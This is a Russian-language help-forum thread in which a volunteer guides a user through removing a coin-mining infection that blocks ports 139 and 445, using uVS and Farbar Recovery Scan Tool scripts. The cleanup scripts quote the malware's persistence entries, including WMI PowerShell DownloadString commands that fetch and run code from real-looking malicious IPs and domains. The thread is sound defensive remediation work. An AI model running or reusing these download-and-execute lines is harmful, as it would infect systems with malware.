10.03.2020, 17:27 | #1 (permalink) |
Member
Регистрация: 10.04.2013
Сообщений: 175
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
|
Автоматически создаются блокировки портов 139 и 445
Что это за хрень такая зловредная? Посмотрите логи, пожалуйста. |
10.03.2020, 17:27 | |
Helpmaster
Member
Регистрация: 08.03.2016
Сообщений: 0
|
Данные ссылки могут раскрыть ваши глаза на решение проблемы Проверить логи, создаются ярлыки Создаются ярлыки .scr Настройка блокировки портов и адресов на роутере Не создаются виртуальные диски |
10.03.2020, 23:00 | #2 (permalink) |
Member
Регистрация: 17.05.2011
Адрес: Тула
Сообщений: 9,825
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 9863
|
На будущее: используйте актуальную версию UVS по ссылке из этой темы, у Вас образ сделан устаревшей.
Файл C:\CAT\CAT.EXE известен? Если нет, проверьте на virustotal.com и ссылку на результат сюда. Выполните скрипт в uVS: Код:
;uVS v4.1.8 [http://dsrt.dyndns.org:8888] ;Target OS: NTv6.1 v400c OFFSGNSAVE addsgn A1BA20CF1DE779D7882251F9E9761245C175B47B0E12655A853CF57B509BA26AE34794EF3F71B8497BC80D7E0E9FB3B2F428563229D3B07965FE416B4C0F6BFA 16 Win64/CoinMiner.XB [ESET-NOD32] 7 chklst delvir delref HTTP://JS.FTP1202.SITE:280/V.SCT regt 25 delref A.EXE delall %SystemRoot%\DEBUG\ITEM.DAT delref PS&C:\WINDOWS\HELP\LSMOSEE.EXE zoo %SystemRoot%\DEBUG\OK.DAT delall %SystemRoot%\DEBUG\OK.DAT delref S.DAT delref S.RAR delref S&C:\WINDOWS\UPDATE.EXE delref HTTP://172.83.155.170:8170/S.XSL delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://103.106.250.161:8161/POWER.TXT')||POWERSHELL.EXE delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://144.208.127.215:8215/POWER.TXT')||POWERSHELL.EXE delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://172.83.155.170:8170/POWER.TXT')||POWERSHELL.EXE delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://192.236.160.237:8237/POWER.TXT')||POWERSHELL.EXE delwmi SYSTEM.NET.WEBCLIENT).DOWNLOADSTRING('HTTP://WMI.1103BYE.XYZ:8080/POWER.TXT')||POWERSHELL.EXE delref %SystemDrive%\USERS\1\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\28.0.1500.9323\RESOURCES\TABLO\TABLEAU delref %SystemDrive%\USERS\1\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\32.0.1700.12508\RESOURCES\YA_TABLEAUDER\TABLEAUDER delref %SystemDrive%\USERS\1\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\NKCPOPGGJCJKIICPENIKEOGIOEDNJEAC\2.7_0\__MSG_BRANDING_PRODUCT_NAME_NOM__ deltmp delnfr apply restart Сделайте лог Farbar Recovery Scan Tool. |
12.03.2020, 03:02 | #3 (permalink) |
Member
Регистрация: 10.04.2013
Сообщений: 175
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
|
Файл C:\CAT\CAT.EXE вполне известен, даже известно его происхождение, и в принципе даже автор его тоже известен. Но на всякий случай проверил, единственное что выдало: SecureAge APEX - Malicious
В uVS этот скрипт выполнил. Проверил KVRT, прошёл несколько раз, находил какие-то разные хрени, все их лечил или удалял. Сделал логи FRST выкладываю. |
12.03.2020, 07:53 | #4 (permalink) |
Member
Регистрация: 17.05.2011
Адрес: Тула
Сообщений: 9,825
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 9863
|
Выделите и скопируйте в буфер обмена следующий код:
Код:
Start:: CreateRestorePoint: CloseProcesses: Task: {702E2218-E19E-498E-9884-D16453E57400} - \oka -> No File <==== ATTENTION Task: {C87366DD-3CCD-4178-A29A-1E87FB6CC005} - \{F2B809EC-5C2C-4E61-BF81-64EF831033D6} -> No File <==== ATTENTION Task: {FAEF8350-9533-44CC-BEF1-3AA0E2CE2D58} - \{DF607842-D67F-4475-BAF2-5A45C3575D5A} -> No File <==== ATTENTION Task: {0EC66334-CAF0-46BE-9857-7F281F3D64F3} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe [1660520 2020-03-05] (Avast Software s.r.o. -> Avast Software) HKLM\SYSTEM\ControlSet001\Services\Ms0A0CDD69AppC => C:\windows\System32\Ms0A0CDD69App.dll <==== ATTENTION (Rootkit!/Locked Service) C:\windows\System32\Ms0A0CDD69App.dll NETSVC: Ms0A0CDD69App -> no filepath. NETSVC: Ms0A0CDD69AppA -> no filepath. NETSVC: Ms0A0CDD69AppB -> no filepath. NETSVC: Ms0A0CDD69AppBak -> no filepath. NETSVC: Ms0A0CDD69AppC -> no filepath. U0 aswVmm; no ImagePath C:\Program Files\Common Files\Avast Software WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION FirewallRules: [{E50734A7-A1B5-43A0-9C06-671C2860512D}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe No File Reboot: End:: Компьютер будет перезагружен автоматически. Удалите все установленные версии Java, они устаревшие и со множеством критических уязвимостей. Если Java вообще нужна для каких- либо приложений, игр (и Вы точно знаете, для каких именно) - установите текущий билд Java 8. В случае устаревших приложений, которым требуется Java 6, обновите до Java SE Runtime Environment 6u45. Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj. Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10). Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу. Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt. Приложите этот файл к своему следующему сообщению. |
12.03.2020, 11:32 | #5 (permalink) |
Member
Регистрация: 10.04.2013
Сообщений: 175
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
|
Всё описанное проделал, вот новые логи
|
Ads | |
Member
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
|
12.03.2020, 11:56 | #6 (permalink) | ||
Member
Регистрация: 17.05.2011
Адрес: Тула
Сообщений: 9,825
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 9863
|
Цитата:
Цитата:
Предварительно, конечно, точку восстановления и бэкап сделать. Ну и всё прочее, что в SecurityCheck.txt упомянуто обновлять, браузеры и приложения Adobe - в первую очередь. |
||
12.03.2020, 13:10 | #7 (permalink) |
Member
Регистрация: 17.05.2011
Адрес: Тула
Сообщений: 9,825
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 9863
|
И для верности такой ещё лог сделайтею
Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350. Файл C:\TDSSKiller.***_log.txt приложите в теме. (где *** - версия программы, дата и время запуска.) |
Ads | |
Member
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
|
|
|